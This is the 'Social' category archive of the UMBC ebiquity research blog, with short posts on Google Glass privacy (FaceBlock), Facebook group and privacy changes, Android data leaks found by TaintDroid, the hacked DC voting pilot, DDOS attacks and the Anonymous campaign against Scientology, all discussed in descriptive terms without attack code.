UMBC ebiquity
Social

Archive for the 'Social' Category

Do not be a Gl***hole, use Face-Block.me!

March 27th, 2014, by Prajit Kumar Das, posted in Ebiquity, Google, Mobile Computing, Policy, Semantic Web, Social, Wearable Computing

If you are a Google Glass user, you might have been greeted with concerned looks or raised eyebrows at public places. There has been a lot of chatter in the “interweb” regarding the loss of privacy that results from people taking your pictures with Glass without notice. Google Glass has simplified photography but as what happens with revolutionary technology people are worried about the potential misuse.

FaceBlock helps to protect the privacy of people around you by allowing them to specify whether or not to be included in your pictures. This new application developed by the joint collaboration between researchers from the Ebiquity Research Group at University of Maryland, Baltimore County and Distributed Information Systems (DIS) at University of Zaragoza (Spain), selectively obscures the face of the people in pictures taken by Google Glass.

Comfort at the cost of Privacy?

As the saying goes, “The best camera is the one that’s with you”. Google Glass suits this description as it is always available and can take a picture with a simple voice command (“Okay Glass, take a picture”). This allows users to capture spontaneous life moments effortlessly. On the flip side, this raises significant privacy concerns as pictures can taken without one’s consent. If one does not use this device responsibly, one risks being labelled a “Glasshole”. Quite recently, a Google Glass user was assaulted by the patrons who objected against her wearing the device inside the bar. The list of establishments which has banned Google Glass within their premises is growing day by day. The dos and donts for Glass users released by Google is a good first step but it doesn’t solve the problem of privacy violation.

FaceBlock_Image_Google_Glass

Privacy-Aware pictures to the rescue

FaceBlock takes regular pictures taken by your smartphone or Google Glass as input and converts it into privacy-aware pictures. This output is generated by using a combination of Face Detection and Face Recognition algorithms. By using FaceBlock, a user can take a picture of herself and specify her policy/rule regarding pictures taken by others (in this case ‘obscure my face in pictures from strangers’). The application would automatically generate a face identifier for this picture. The identifier is a mathematical representation of the image. To learn more about the working on FaceBlock, you should watch the following video.

Using Bluetooth, FaceBlock can automatically detect and share this policy with Glass users near by. After receiving this face identifier from a nearby user, the following post processing steps happen on Glass as shown in the images.

FaceBlock_Image_Eigen_UncheckFaceBlock_Image_Eigen_CheckFaceBlock_Image_Blur

What promises does it hold?

FaceBlock is a proof of concept implementation of a system that can create privacy-aware pictures using smart devices. The pervasiveness of privacy-aware pictures could be a right step towards balancing privacy needs and comfort afforded by technology. Thus, we can get the best out of Wearable Technology without being oblivious about the privacy of those around you.

FaceBlock is part of the efforts of Ebiquity and SID in building systems for preserving user privacy on mobile devices. For more details, visit http://face-block.me

Lisp bots win Planet Wars Google AI Challenge

December 2nd, 2010, by Tim Finin, posted in Agents, AI, Games, Google, Social

top programming languages in Planet Wars
The Google-supported Planet Wars Google AI Challenge had over 4000 entries that used AI and game theory to compete against one another. C at the R-Chart blog analyzed the programming languages used by the contestants with some interesting results.

The usual suspects were the most popular languages used: Java, C++, Python, C# and PHP. The winner, Hungarian Gábor Melis, was just one of 33 contestants who used Lisp. Even less common were entries in C, but the 18 “C hippies” did remarkably well.

Blogger C wonders if Lisp was the special sauce:

Paul Graham has stated that Java was designed for “average” programmers while other languages (like Lisp) are for good programmers. The fact that the winner of the competition wrote in Lisp seems to support this assertion. Or should we see Mr. Melis as an anomaly who happened to use Lisp for this task?

New Facebook Groups Considered Harmful

October 7th, 2010, by Tim Finin, posted in Facebook, Privacy, Security, Social, Social media

Facebook has rolled out a new version of groups announced on the Facebook blog.

“Until now, Facebook has made it easy to share with all of your friends or with everyone, but there hasn’t been a simple way to create and maintain a space for sharing with the small communities of people in your life, like your roommates, classmates, co-workers and family.

Today we’re announcing a completely overhauled, brand new version of Groups. It’s a simple way to stay up to date with small groups of your friends and to share things with only them in a private space. The default setting is Closed, which means only members see what’s going on in a group.”

There are three kinds of groups: open, closed and secret. Open groups have public membership listings and public content. Private ones have public membership but public but private content. For secret groups, both the membership and content are private.

A key part of the idea is that the group members collectively define who is in the group, spreading the work of setting up and maintaining the group over many people.

But a serious issue with the new Facebook group framework is that a member can unilaterally add any of their friends to a group. No confirmation is required by the person being added. This was raised as an issue by Jason Calacanis.

The constraint that one can only add Facebook friend to a group he belongs to does offer some protection against ending up in unwanted groups (e.g., by spammers). But it could still lead to problems. I could, for example, create a closed group named Crazy people who smell bad and add all of my friends without their consent. Since the group is not secret like this one, anyone can see who is in the group. Worse yet, I could then leave the group. (By the way, let me know if you want to join any of these groups).

While this might just be an annoying prank, it could spin out of control — what might happen if one of your so called friends adds you to the new, closed “Al-Queda lovers” group?

The good news is that this should be easy to fix. After all, Facebook does require confirmation for the friend relation and has a mechanism for recommending that friends like pages or try apps. Either mechanism would work for inviting others to join groups.

We have started working with a new group-centric secure information sharing model being developed by Ravi Sandhu and others as a foundation for better access and privacy contols in social media systems. It seems like a great match.

See update.

How the DC Internet voting pilot was hacked

October 6th, 2010, by Tim Finin, posted in cybersecurity, Security, Social

University of Michigan professor J. Alex Halderman explains how his research group compromised the Washington DC online voting pilot in his blog post, Hacking the D.C. Internet Voting Pilot.

“The District of Columbia is conducting a pilot project to allow overseas and military voters to download and return absentee ballots over the Internet. Before opening the system to real voters, D.C. has been holding a test period in which they’ve invited the public to evaluate the system’s security and usability. … Within 36 hours of the system going live, our team had found and exploited a vulnerability that gave us almost total control of the server software, including the ability to change votes and reveal voters’ secret ballots. In this post, I’ll describe what we did, how we did it, and what it means for Internet voting.”

The problem was a shell-injection vulnerability that involved the procedure used to upload absentee ballots. Halderman concludes

“The specific vulnerability that we exploited is simple to fix, but it will be vastly more difficult to make the system secure. We’ve found a number of other problems in the system, and everything we’ve seen suggests that the design is brittle: one small mistake can completely compromise its security. I described above how a small error in file-extension handling left the system open to exploitation. If this particular problem had not existed, I’m confident that we would have found another way to attack the system.”

Taintdroid catches Android apps that leak private user data

September 30th, 2010, by Tim Finin, posted in Mobile Computing, Privacy, Security, Social

Ars Technica has an an article on bad Android apps, Some Android apps caught covertly sending GPS data to advertisers.

“The results of a study conducted by researchers from Duke University, Penn State University, and Intel Labs have revealed that a significant number of popular Android applications transmit private user data to advertising networks without explicitly asking or informing the user. The researchers developed a piece of software called TaintDroid that uses dynamic taint analysis to detect and report when applications are sending potentially sensitive information to remote servers.

They used TaintDroid to test 30 popular free Android applications selected at random from the Android market and found that half were sending private information to advertising servers, including the user’s location and phone number. In some cases, they found that applications were relaying GPS coordinates to remote advertising network servers as frequently as every 30 seconds, even when not displaying advertisements. These findings raise concern about the extent to which mobile platforms can insulate users from unwanted invasions of privacy.”

TaintDroid is an experimental system that “analyses how private information is obtained and released by applications ‘downloaded’ to consumer phones”. A paper on the system will be presented at the 2010 USENIX Symposium on Operating Systems Design and Implementation later this month.

TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones, William Enck, Peter Gilbert, Byung-gon Chun, Landon P. Cox, Jaeyeon Jung, Patrick McDaniel, and Anmol N. Sheth, OSDI, October 2010.

The project, Realtime Privacy Monitoring on Smartphones has a good overview site with a FAQ and demo.

This is just one example of a rich and complex area full of trade-offs. We want our systems and devices to be smarter and to really understand us — our preferences, context, activities, interests, intentions, and pretty much everything short of our hopes and dreams. We then want them to use this knowledge to better serve us — selecting music, turing the ringer on and off, alerting us to relevant news, etc. Developing this technology is neither easy nor cheap and the developers have to profit from creating it. Extracting personal information that can be used or sold is one model — just as Google and others do to provide better ad placement on the Web.

Here’s a quote from the Ars Technical article that resonated with me.

“As Google says in its list of best practices that developers should adopt for data collection, providing users with easy access to a clear and unambiguous privacy policy is really important.”

We, and many others, are trying to prepare for the next step — when users can define their own privacy policies and these will be understood and enforced by their devices.

WebFinger: a finger protocol for the Web

August 15th, 2009, by Tim Finin, posted in Google, Semantic Web, Social, Social media, Web

Maybe WebFinger will succeed where others have failed. At what? At providing a simple handle for a person that can be easily used to get basic information that the person wants to make available. The WebFinger proposal is to use an email address as the handle.

WebFinger, aka Personal Web Discovery. i.e. We’re bringing back the finger protocol, but using HTTP this time.

Techcrunch has a post on this, Google Points At WebFinger. Your Gmail Address Could Soon Be Your ID with some background.

There’s some excitement around the web today among a certain group of high profile techies. What are they so excited about? Something called WebFinger, and the fact that Google is apparently getting serious about supporting it. So what is it?

It’s an extension of something called the “finger protocol” that was used in the earlier days of the web to identify people by their email addresses. As the web expanded, the finger protocol faded out, but the idea of needing a unified way to identify yourself has not. That’s why you keep hearing about OpenID and the like all the time.

The current focus of the WebFinger group is on developing the spec for accessing a user’s metadata given their handle. Using RDF and the FOAF vocabulary should be a no-brainer for representing the metadata.

Apparent DDOS attacks on twitter, facebook and livejournal

August 6th, 2009, by Tim Finin, posted in Security, Social, Social media

It will be interesting to see what comes from today’s DDOS attacks on twitter, facebook and liveJournal. It is certainly a show of strength from whoever controls the botnets that launched the attacks. We can only assume that three three are from the same source or at lease related sources. Some sources:

Was it a test? Demonstration? Preparation for extortion (Nice little Internet you got there. Shame if something happened to it.)?

Update 16:45: Here’s a graph from Arbor Networks (via NYT) showing a dramatic drop in traffic this morning.


twitterfall

Changes in FaceBook default privacy policy

July 1st, 2009, by Tim Finin, posted in Privacy, Security, Social, Social media, Web

FaceBook is changing how it manages privacy starting today. After reading last week’s post on the FaceBook blog, More Ways to Share in the Publisher, and a followup note on ReadWriteWeb, A Closer Look at Facebook’s New Privacy Options, I thought I understood: Facebook was sharing more but only for people who have made their profiles public. From the official FaceBook post:

“We’ve received some questions in the comments about default privacy settings for this beta. Nothing has changed with your default privacy settings. The beta is only open to people who already chose to set their profile and status privacy to “Everyone.” For those people, the default for sharing from the Publisher will be the same. If you have your default privacy set to anything else—such as “Friends and Networks” or “Friends Only”—you are not part of this beta.”

But the New York Times has an article, The Day Facebook Changed: Messages to Become Public by Default that clearly says more is coming (emphasis added):

“By default, all your messages on Facebook will soon be naked visible to the world. The company is starting by rolling out the feature to people who had already set their profiles as public, but it will come to everyone soon. You’ll be able each time you publish a message to change that message’s privacy setting and from that drop down there’s a link to change your default setting.

But most people will not change the setting. Facebook messages are about to be publicly visible. A whole lot of people are going to hate it. When ex-lovers, bosses, moms, stalkers, cops, creeps and others find out what people have been posting on Facebook – the reprimand that “well, you could have changed your default setting” is not going to sit well with people.”

But it will come to everyone soon! That’s a big change if true. There will be blood.

I hope that there is come clarification soon from FaceBook. I, for one, am left confused.

Conservatism and cognitive ability are negatively correlated

April 25th, 2009, by Tim Finin, posted in GENERAL, Social

“Conservatism and cognitive ability are negatively correlated”. How’s that for a provocative opening sentence in an academic paper! Lazar Stankova of the National Institute of Education in Singapore reports this finding in a paper published earlier this year in the Elsevier journal Intelligence.

Lazar Stankova, Conservatism and cognitive ability, Intelligence, v37, n3, pp. 294-304, May-June 2009.

I’ve only scanned the paper, but it looks like a serious study. Here’s the abstract:

“Conservatism and cognitive ability are negatively correlated. The evidence is based on 1254 community college students and 1600 foreign students seeking entry to United States’ universities. At the individual level of analysis, conservatism scores correlate negatively with SAT, Vocabulary, and Analogy test scores. At the national level of analysis, conservatism scores correlate negatively with measures of education (e.g., gross enrollment at primary, secondary, and tertiary levels) and performance on mathematics and reading assessments from the PISA (Programme for International Student Assessment) project. They also correlate with components of the Failed States Index and several other measures of economic and political development of nations. Conservatism scores have higher correlations with economic and political measures than estimated IQ scores.

The paper describes a meta-analysis based on data from three studies that employed the same set of psychological measures. Twenty-two of these measures were selected, drawn from four domains: personality, social attitudes, values, and social norms. While the paper finds strong support for the hypothesis that low cognitive ability is associated with high conservatism it doesn’t make any statements about causality.

There is room for disagreement about the definition of conservatism and it’s projection to the 22 measures. The following narrative definition of conservatism is given, which is broad and dominated by personal and social aspects. It’s clearly not limited to the political or economic domain.

“The Conservative syndrome describes a person who attaches particular importance to the respect of tradition, humility, devoutness and moderation as well as to obedience, self-discipline and politeness, social order, family, and national security and has a sense of belonging to and a pride in a group with which he or she identifies. A Conservative person also subscribes to conventional religious beliefs and accepts the mystical, including paranormal, experiences. The same person is likely to be less open to intellectual challenges and will be seen as a responsible “good citizen” at work and in the society while expressing rather harsh views toward those outside his or her group.”

If you can’t access the paper on Elsevier’s Science Direct digital library, you can look at three key tables here: Table 1, Table 2, and Table 3.

Is it Lindsay Lohan or your friends who make you a binge drinker?

June 23rd, 2008, by Tim Finin, posted in Agents, Social, Social media

What determines our behavior or beliefs? Are we influenced by people who are the well-known and popular leaders — political, social, religious — in our society or by the few hundred people that are in our immediate social network — family, friends and co-workers. It’s reasonable to assume that it varies by domain or topic, with your music preferences falling in the first category and your spiritual orientation in the second.

Paul Ormerod and Greg Wiltshire have a preprint of a paper ‘Binge’ drinking in the UK: a social network phenomenon (pdf) that reports on a study that the binge drinking phenomenon seems to spread through “small world” social networks rather than by imitating influentials in a “scale free” network

“We analyse the recent rapid growth of ‘binge’ drinking in the UK. This means the consumption of large amounts of alcohol, especially by young people, leading to serious anti-social and criminal behaviour in urban centres. We show how a simple agent-based model, based on binary choice with externalities, combined with a small amount of survey data can explain the phenomenon. We show that the increase in binge drinking is a fashion-related phenomenon, with imitative behaviour spreading across social networks. The results show that a small world network, rather than a random or scale free, offers the best description of the key aspects of the data.”

It’s fascinating that with the right data, simulation models can help to answer such questions.

The Missouri Mom (Lori Drew) case — Privacy Issues and New Legal Theories ?

May 22nd, 2008, by Anupam Joshi, posted in GENERAL, Privacy, Social, Social media, Web

As the news media have all reported, Lori Drew has been indicted for her role in the death of a teenager. You may recall that this person, with her daughter and her friend, created a fake MySpace account, pretend to befriend another teen, and then “dump” her. The other teen committed suicide.  Opinions are split on whether being mean to a person, even to a kid, is a criminal offense that should lead to prosecution, as opposed to societal opprobrium.

What interested me however that of the four counts of the indictment, three had to do with violating the Terms of Service –in particular creating a fake profile, and using this fake profile to obtain information from the server. This was done under federal laws that criminalize unauthorized access — things like hacking into a server. So does this mean that the legal theory being advanced by the US Attorney for the Central District of California is that creating a fake account on an internet service is criminalizable if the ToS of the provider say that you should give accurate information ?  Certainly many experts that USA Today talked to seem to think so. No more creating accounts with fictitious names at newspaper sites that many people can use ? How about using the right name, but messing up some of the information ( income level, demographics) at each site so that they can’t datamine you ? Or not providing the right contact information (a@b.com), so that they can’t sell it to telemarketers ? Or any of the various other things that people routinely do in terms of providing incomplete or incorrect information. The penalty now can be criminal, not just a shutting down of access to the site concerned. Hmmm…….

Anonymous, leaderless resistance and Scientology

January 26th, 2008, by Tim Finin, posted in Blogging, Social, Social media, Web

Leaderless resistance is defined on Wikipedia as

“…a political resistance strategy in which small, independent groups (covert cells) challenge an established adversary such as a government. Leaderless resistance can encompass anything from non-violent disruption and disobedience to bombings, assassinations and other violent agitation. Leaderless cells lack bidirectional, vertical command links operating without a hierarchical command.” (link)

It’s challenging to combat a leaderless resistance because one can’t use the usual methods to discover participants by exploiting the social networks of known members.

Today’s new communication infrastructures make it easier for such distributed resistance movements to take hold and grow. Information, instructions and loose coordination can be spread via Web pages, Blogs, text messages, IRCs, mailing lists, etc.

A colleague Chris Diehl at JHU APL suggested the Estonian cyberwar might be a good example to study how the Blogosphere was used for this by combining sentiment analysis, geotagging and temporal analysis. This cyber attack was a subject of a recent colloquium at APL. It’s a great idea, but one made more challenging by the fact that the attack is over and would involve dealing with content in Estonian, which, although not exactly a low-density language, is also not one that has been extensively studied by computational linguists.

But maybe there is another example of an Internet-driven leaderless resistance, going on right now, that would be good to study as it unfolds. A group that calls itself Anonymous has announced it intends to launch an online DDOS attack on Scientology as part of a campaign against the organization.


[youtube=http://youtube.com/watch?v=JCbKv9yiLiQ]

The message is spread in part by YouTube videos starting on 21 January. There is also the Wikipedia page on Project Chanology which was created on 24 January 2008, an Anonymous Scientology Widget that counts down to (I suppose) when participating members should take action, and lost of mentions on forums, blogs and other forms of social media.

Linuxhaxor has instructions for what to do, which are offered only for educational purposes.

“This guide is for information purpose only, I, the site owner, do not encourage people to go about and follow these steps or Chanology in anyway to carry this attack, or any attack to any organization or any person. If you agree to follow these steps and help them carry this attack you are fully responsible for any consequences whatsoever. This act is illegal in many states and countries. ”

Wired just ran a story on this leaderless resistance effort, Anonymous Hackers Shoot For Scientologists, Hit Dutch School Kids, and there are plenty more online.

Finally, you can track the online interest through this Blogpulse trend graph comparing Blogosphere mentions of (1) “Tom Cruise” (2) Scientology and (3) anonymous+scientology and also the Google Trends graph comparing Google searches for the same three terms. Click on the graphs to see the current results.

Mentions of scientology, tom cruise and anonymous via Blogpulse

Google searches for scientology, Tom Cruise and anonymous

Tom Cruise is in there because he’s rumored to be the second most important person in the Church of Scientology and his recent Scientology indoctrination video that surfaced on YouTube may have been the tipping point for some.

You are currently browsing the archives for the Social category.

  Home | Archive | Login | Feed